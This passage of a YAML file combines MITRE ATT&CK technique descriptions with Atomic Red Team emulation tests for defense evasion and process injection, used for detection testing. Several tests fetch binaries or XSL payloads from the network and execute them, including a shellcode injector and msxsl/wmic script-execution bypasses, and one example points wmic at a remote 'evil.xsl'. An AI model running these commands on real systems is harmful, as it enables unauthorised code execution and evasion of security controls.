may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001)
execution restrictions and evade defensive counter measures by \"living off
the land.\"(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may
function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation:
7 - appv)\n\nFor example, [PowerShell](https://attack.mitre.org/techniques/T1059/001)
commands may be invoked using:(Citation: 5 - appv)\n\n`SyncAppvPublishingServer.vbs
\"n; {PowerShell}\"`"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shaul Vilkomir-Preisman
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1548.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e8a0a025-3601-4755-abfb-8d08283329fb
created: '2024-03-21T21:10:57.322Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1548/006
external_id: T1548.006
- source_name: welivesecurity TCC
description: 'Marc-Etienne M.Léveillé. (2022, July 19). I see what you did
there: A look at the CloudMensis macOS spyware. Retrieved March 21, 2024.'
url: https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/
- source_name: TCC Database
description: 'Marina Liang. (2024, April 23). Return of the mac(OS): Transparency,
Consent, and Control (TCC) Database Manipulation. Retrieved March 28, 2024.'
url: https://interpressecurity.com/resources/return-of-the-macos-tcc/
- source_name: TCC macOS bypass
description: Phil Stokes. (2021, July 1). Bypassing macOS TCC User Privacy
Protections By Accident and Design. Retrieved March 21, 2024.
url: https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T23:14:58.393Z'
name: TCC Manipulation
description: |+
Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Marina Liang
- Wojciech Reguła @_r3ggi
- Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.1'
atomic_tests: []
T1055.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f
created: '2020-01-14T01:33:19.065Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/008
external_id: T1055.008
- source_name: PTRACE man
description: Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's
Manual. Retrieved February 21, 2020.
url: http://man7.org/linux/man-pages/man2/ptrace.2.html
- source_name: Medium Ptrace JUL 2018
description: Jain, S. (2018, July 25). Code injection in running process using
ptrace. Retrieved February 21, 2020.
url: https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be
- source_name: BH Linux Inject
description: Colgan, T. (2015, August 15). Linux-Inject. Retrieved February
21, 2020.
url: https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf
- source_name: ArtOfMemoryForensics
description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics:
Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved
December 20, 2017.'
- source_name: GNU Acct
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
url: https://www.gnu.org/software/acct/
- source_name: RHEL auditd
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
- source_name: Chokepoint preload rootkits
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:33.344Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
as possibly elevate privileges. Ptrace system call injection is a method of
executing arbitrary code in the address space of a separate live process.
\n\nPtrace system call injection involves attaching to and modifying a running
process. The ptrace system call enables a debugging process to observe and
control another process (and each individual thread), including changing memory
and register values.(Citation: PTRACE man) Ptrace system call injection is
commonly performed by writing arbitrary code into a running process (ex: malloc)
then invoking that memory with PTRACE_SETREGS to set the register
containing the next instruction to execute. Ptrace system call injection can
also be done with PTRACE_POKETEXT/PTRACE_POKEDATA,
which copy data to a specific address in the target processes’ memory (ex:
the current address of the next instruction). (Citation: PTRACE man)(Citation:
Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible
targeting processes that are non-child processes and/or have higher-privileges.(Citation:
BH Linux Inject) \n\nRunning code in the context of another process may allow
access to the process's memory, system/network resources, and possibly elevated
privileges. Execution via ptrace system call injection may also evade detection
from security products since the execution is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.2'
atomic_tests: []
T1027.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4
created: '2022-08-22T20:42:08.498Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/007
external_id: T1027.007
- source_name: Huntress API Hash
description: 'Brennan, M. (2022, February 16). Hackers No Hashing: Randomizing
API Hashes to Evade Cobalt Strike Shellcode Detection. Retrieved August
22, 2022.'
url: https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection
- source_name: BlackHat API Packers
description: Choi, S. (2015, August 6). Obfuscated API Functions in Modern
Packers. Retrieved August 22, 2022.
url: https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf
- source_name: Drakonia HInvoke
description: drakonia. (2022, August 10). HInvoke and avoiding PInvoke. Retrieved
August 22, 2022.
url: https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03
- source_name: IRED API Hashing
description: spotheplanet. (n.d.). Windows API Hashing in Malware. Retrieved
August 22, 2022.
url: https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:24:25.266Z'
name: 'Obfuscated Files or Information: Dynamic API Resolution'
description: |-
Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.
API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
identifier: T1027.007
atomic_tests:
- name: Dynamic API Resolution-Ninja-syscall
auto_generated_guid: 578025d5-faa9-4f6d-8390-aae739d507e1
description: 'This test calls NtCreateFile via API hashing and dynamic syscall
resolution. I have dubbed this particular combination of techniques ''Ninja-syscall''.
When successful, a new file named ''hello.log'' will be created in the default
user''s temporary folder, which is a common location for a dropper.
'
supported_platforms:
- windows
input_arguments:
exe_binary:
description: PE binary
type: path
default: PathToAtomicsFolder\T1027.007\bin\ninja_syscall1.exe
dependency_executor_name: powershell
dependencies:
- description: 'Portable Executable to run must exist at specified location
(#{exe_binary})
'
prereq_command: 'if (Test-Path "#{exe_binary}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{exe_binary}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.007/bin/ninja_syscall1.exe" -OutFile "#{exe_binary}"
executor:
command: |
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
if (Test-Path "C:\Users\Default\AppData\Local\Temp\hello.log") { Remove-Item "C:\Users\Default\AppData\Local\Temp\hello.log" -Force; Write-Host "[+] hello.log removed." }
cleanup_command: if (Test-Path "C:\Users\Default\AppData\Local\Temp\hello.log")
{ Remove-Item "C:\Users\Default\AppData\Local\Temp\hello.log" -Force; Write-Host
"[+] hello.log removed." }
name: powershell
elevation_required: true
T1055.015:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
created: '2021-11-22T15:02:15.190Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/015
external_id: T1055.015
- source_name: Hexacorn Listplanting
description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
trick. Retrieved August 14, 2024.
url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
- source_name: ESET InvisiMole June 2020
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- source_name: Microsoft List View Controls
description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
January 4, 2022.
url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- source_name: Modexp Windows Process Injection
description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
Retrieved November 15, 2021.'
url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:33.701Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
Code executed via ListPlanting may also evade detection from security products
since the execution is masked under a legitimate process.\n\nList-view controls
are user interface windows used to display collections of items.(Citation:
Microsoft List View Controls) Information about an application's list-view
settings are stored within the process' memory in a SysListView32
control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
be performed by copying code into the virtual address space of a process that
uses a list-view control then using that code as a custom callback for sorting
the listed items.(Citation: Modexp Windows Process Injection) Adversaries
must first copy code into the target process’ memory space, which can be performed
various ways including by directly obtaining a handle to the SysListView32
child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
of the highly monitored WriteProcessMemory function. For example,
an adversary can use the PostMessage and/or SendMessage
API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION
messages, effectively copying a payload 2 bytes at a time to the allocated
memory.(Citation: ESET InvisiMole June 2020) \n\nFinally, the payload is triggered
by sending the LVM_SORTITEMS message to the SysListView32
child of the process window, with the payload within the newly allocated buffer
passed and executed as the ListView_SortItems callback."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- ESET
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1055.015
atomic_tests:
- name: Process injection ListPlanting
auto_generated_guid: 4f3c7502-b111-4dfe-8a6e-529307891a59
description: This test injects shellcode into a remote RegEdit process using
the ListPlanting technique. ListPlanting exploits Window with ListView control.
Code write to memory with NtWriteVirtualMemory. The shellcode is executed
via PostMessage. When successful, a message box will appear with the title
"Warning" and the content "Atomic Red Team" after a few seconds. Notepad will
open following the appearance of the message box.
supported_platforms:
- windows
input_arguments:
exe_binary:
description: PE binary
type: path
default: PathToAtomicsFolder\T1055.015\bin\ListPlanting.exe
dependency_executor_name: powershell
dependencies:
- description: 'Injector ListPlanting.exe must exist at specified location (#{exe_binary})
'
prereq_command: 'if (Test-Path "#{exe_binary}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{exe_binary}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.015/bin/ListPlanting.exe" -OutFile "#{exe_binary}"
executor:
command: |-
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
Stop-Process -Force
name: powershell
elevation_required: true
T1484:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d
created: '2019-03-07T14:10:32.650Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484
external_id: T1484
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a
- source_name: ADSecurity GPO Persistence 2016
description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence
#17: Group Policy. Retrieved March 5, 2019.'
url: https://adsecurity.org/?p=2716
- source_name: Microsoft 365 Defender Solorigate
description: Microsoft 365 Defender Team. (2020, December 28). Using Microsoft
365 Defender to protect against Solorigate. Retrieved January 7, 2021.
url: https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/
- source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods
description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved
December 30, 2020.
url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml
- source_name: Microsoft - Update or Repair Federated domain
description: Microsoft. (2020, September 14). Update or repair the settings
of a federated domain in Office 365, Azure, or Intune. Retrieved December
30, 2020.
url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365
- source_name: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 30, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
- source_name: Okta Cross-Tenant Impersonation 2023
description: 'Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant
Impersonation: Prevention and Detection. Retrieved February 15, 2024.'
url: https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
- source_name: Wald0 Guide to GPOs
description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and
OUs. Retrieved March 5, 2019.
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
September 23, 2024.
url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved November 17, 2024.
url: https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:33.897Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
managed environments. Such services provide a centralized means of managing
identity resources such as devices and accounts, and often include configuration
settings that may apply between domains or tenants such as trust relationships,
identity syncing, or identity federation.\n\nModifications to domain or tenant
settings may include altering domain Group Policy Objects (GPOs) in Microsoft
Active Directory (AD) or changing trust settings for domains, including federation
trusts relationships between domains or tenants.\n\nWith sufficient permissions,
adversaries can modify domain or tenant policy settings. Since configuration
settings for these services apply to a large number of identity resources,
there are a great number of potential attacks malicious outcomes that can
stem from this abuse. Examples of such abuse include: \n\n* modifying GPOs
to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)
to computers throughout the domain environment(Citation: ADSecurity GPO Persistence
2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)\n*
modifying domain trusts to include an adversary-controlled domain, allowing
adversaries to forge access tokens that will subsequently be accepted by
victim domain resources(Citation: Microsoft - Customer Guidance on Recent
Nation-State Cyber Attacks)\n* changing configuration settings within the
AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).\n*
adding new, adversary-controlled federated identity providers to identity
tenants, allowing adversaries to authenticate as any user managed by the victim
tenant (Citation: Okta Cross-Tenant Impersonation 2023)\n\nAdversaries may
temporarily modify domain or tenant policy, carry out a malicious action(s),
and then revert the change to remove suspicious indicators."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Obsidian Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Identity Provider
x_mitre_version: '3.2'
atomic_tests: []
T1220:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
created: '2018-10-17T00:14:20.652Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1220
external_id: T1220
- source_name: Reaqta MSXSL Spearphishing MAR 2018
description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
MSXSL. Retrieved July 3, 2018.
url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- source_name: Twitter SquiblyTwo Detection APR 2018
description: Desimone, J. (2018, April 18). Status Update. Retrieved September
12, 2024.
url: https://x.com/dez_/status/986614411711442944
- source_name: LOLBAS Wmic
description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- source_name: Microsoft msxsl.exe
description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
Retrieved July 3, 2018.
url: https://www.microsoft.com/download/details.aspx?id=21714
- source_name: Penetration Testing Lab MSXSL July 2017
description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
July 3, 2018.
url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- source_name: XSL Bypass Mar 2019
description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
Proxy Code Execution. Retrieved August 2, 2019.
url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- source_name: Microsoft XSLT Script Mar 2017
description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
Using . Retrieved July 3, 2018.
url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:33.993Z'
name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
* msxsl.exe customers[.]xml script[.]xsl
* msxsl.exe script[.]xsl script[.]xsl
* msxsl.exe script[.]jpeg script[.]jpeg
Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Avneet Singh
- Casey Smith
- Praetorian
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1220
atomic_tests:
- name: MSXSL Bypass using local files
auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d
description: "Executes the code specified within a XSL script tag during XSL
transformation using a local payload. \nRequires download of MSXSL. No longer
available from Microsoft.\n(Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714
) \nOpen Calculator.exe when test successfully executed, while AV turned off.\n"
supported_platforms:
- windows
input_arguments:
xmlfile:
description: Location of the test XML file on the local filesystem.
type: path
default: PathToAtomicsFolder\T1220\src\msxslxmlfile.xml
xslfile:
description: Location of the test XSL script file on the local filesystem.
type: path
default: PathToAtomicsFolder\T1220\src\msxslscript.xsl
msxsl_exe:
description: Location of the MSXSL executable.
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe
dependency_executor_name: powershell
dependencies:
- description: 'XML file must exist on disk at specified location (#{xmlfile})
'
prereq_command: 'if (Test-Path "#{xmlfile}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{xmlfile}") -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}"
- description: 'XSL file must exist on disk at specified location (#{xslfile})
'
prereq_command: 'if (Test-Path "#{xslfile}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{xslfile}") -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}"
- description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe})
'
prereq_command: 'if (Test-Path "#{msxsl_exe}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}"
executor:
command: '"#{msxsl_exe}" "#{xmlfile}" "#{xslfile}"
'
cleanup_command: 'del "#{msxsl_exe}" >nul 2>&1
'
name: command_prompt
- name: MSXSL Bypass using remote files
auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
description: |
Executes the code specified within a XSL script tag during XSL transformation using a remote payload.
Requires download of MSXSL.exe. No longer available from Microsoft.
(Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )
Open Calculator.exe when test successfully executed, while AV turned off.
supported_platforms:
- windows
input_arguments:
xmlfile:
description: Remote location (URL) of the test XML file.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
xslfile:
description: Remote location (URL) of the test XSL script file.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
msxsl_exe:
description: Location of the MSXSL executable.
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe
dependency_executor_name: powershell
dependencies:
- description: 'msxsl.exe must exist on disk at specified location ("#{msxsl_exe}")
'
prereq_command: 'if (Test-Path "#{msxsl_exe}") {exit 0} else {exit 1}
'
get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe"
-OutFile "#{msxsl_exe}"
'
executor:
command: '"#{msxsl_exe}" "#{xmlfile}" "#{xslfile}"
'
cleanup_command: 'del -Path #{msxsl_exe} >nul 2>&1
'
name: command_prompt
- name: WMIC bypass using local XSL file
auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988
description: 'Executes the code specified within a XSL script using a local
payload.
'
supported_platforms:
- windows
input_arguments:
wmic_command:
description: WMI command to execute using wmic.exe
type: string
default: process list
local_xsl_file:
description: Location of the test XSL script file on the local filesystem.
type: path
